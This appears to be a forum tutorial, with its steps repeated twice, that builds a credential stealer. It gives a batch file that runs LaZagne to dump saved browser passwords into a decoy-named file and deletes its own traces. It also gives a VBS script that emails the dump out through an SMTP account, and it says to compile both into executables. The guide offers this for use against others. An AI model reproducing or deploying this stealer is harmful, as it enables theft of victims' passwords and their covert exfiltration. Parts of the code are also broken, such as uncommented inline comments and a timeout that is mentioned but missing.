- 897
- 45
- 1,045
Report submission method: mailbox.
Difficulty: nowhere easier.
Supported browsers at the time of this writing: IE, Chrome, Firefox, Opera.
We will need:
1. LaZagne - a program for recovering passwords and writing them to a file.
2. Batch file for launching LaZagne and specifying the save directory and its name.
3. Script on VBS to send letters to the postal address.
4. VBS to EXE Converter (optional, possible without it).
5. BAT to EXE Converter.
Step 1. Create a Batch (text file with extension bat.) File with the following lines:
where "D: \ install_error.bin" is the directory and name of the saved report, TIMEOUT is necessary to wait for the report to be created (on average this process takes 1 second for 100 passwords).
Step 2. Create a plain text document in Notepad ++, for example. And save it in .vbs format
Step 3. Compile this mess using BAT to EXE Converter.
Note: Pay attention to the file SENDER.EXE, in this case the converter used VBS to EXE.
After that, save our .exe file and run it.
Step 4. Go to the mailbox and check the letter.
Step 5. Open the file on your computer through a text editor and enjoy the profit.
Difficulty: nowhere easier.
Supported browsers at the time of this writing: IE, Chrome, Firefox, Opera.
We will need:
1. LaZagne - a program for recovering passwords and writing them to a file.
2. Batch file for launching LaZagne and specifying the save directory and its name.
3. Script on VBS to send letters to the postal address.
4. VBS to EXE Converter (optional, possible without it).
5. BAT to EXE Converter.
Step 1. Create a Batch (text file with extension bat.) File with the following lines:
@Echo off
laZagne.exe all > D:\install_error.bin
del /s "%UserProfile%\Downloads\laZagne.exe"
del /s "%UserProfile%\Downloads\SENDER.exe"
del /s "%UserProfile%\Desktop\laZagne.exe"
del /s "%UserProfile%\Desktop\SENDER.exe"
where "D: \ install_error.bin" is the directory and name of the saved report, TIMEOUT is necessary to wait for the report to be created (on average this process takes 1 second for 100 passwords).
Step 2. Create a plain text document in Notepad ++, for example. And save it in .vbs format
Dim o_Mess, v_Conf
v_Conf = "xttp://schemas.microsoft.com/cdo/configuration/"
Set o_Mess = CreateObject ("CDO.Message")
With o_Mess
.To = "получатель@mail.ru" 'куда отправляем
.From = "Имя <отправитель@mail.ru>" 'имя отправителя + Email
.Subject = "Log" Тема письма
.TextBody = "BodyMail" Сообщение
.AddAttachment "D:\install_error.bin" Прикрепить файл
.TextBodyPart.Charset = "windows-1251" русская кодировка
With .Configuration.Fields
.Item(v_Conf & "sendusing") = 2 без использования каталога Server Exchange
.Item(v_Conf & "smtpserver") = "smtp.mail.ru" Адрес SMTP-сервера
.Item(v_Conf & "smtpauthenticate") = 1 Тип авторизации
.Item(v_Conf & "sendusername") = "отправитель@mail.ru" здесь имя пользователя
.Item(v_Conf & "sendpassword") = "пароль отправителя" 'пароль
.Item(v_Conf & "smtpserverport") = 465 'порт (альтернативный - 465)
.Item(v_Conf & "smtpusessl") = True использовать ли шифрованое подключение SSL
.Item(v_Conf & "smtpconnectiontimeout") = 60 Время до завершения повторных попыток подключения
End With
End With
Set o_Mess = Nothing
Step 3. Compile this mess using BAT to EXE Converter.
Note: Pay attention to the file SENDER.EXE, in this case the converter used VBS to EXE.
After that, save our .exe file and run it.
Step 4. Go to the mailbox and check the letter.
Step 5. Open the file on your computer through a text editor and enjoy the profit.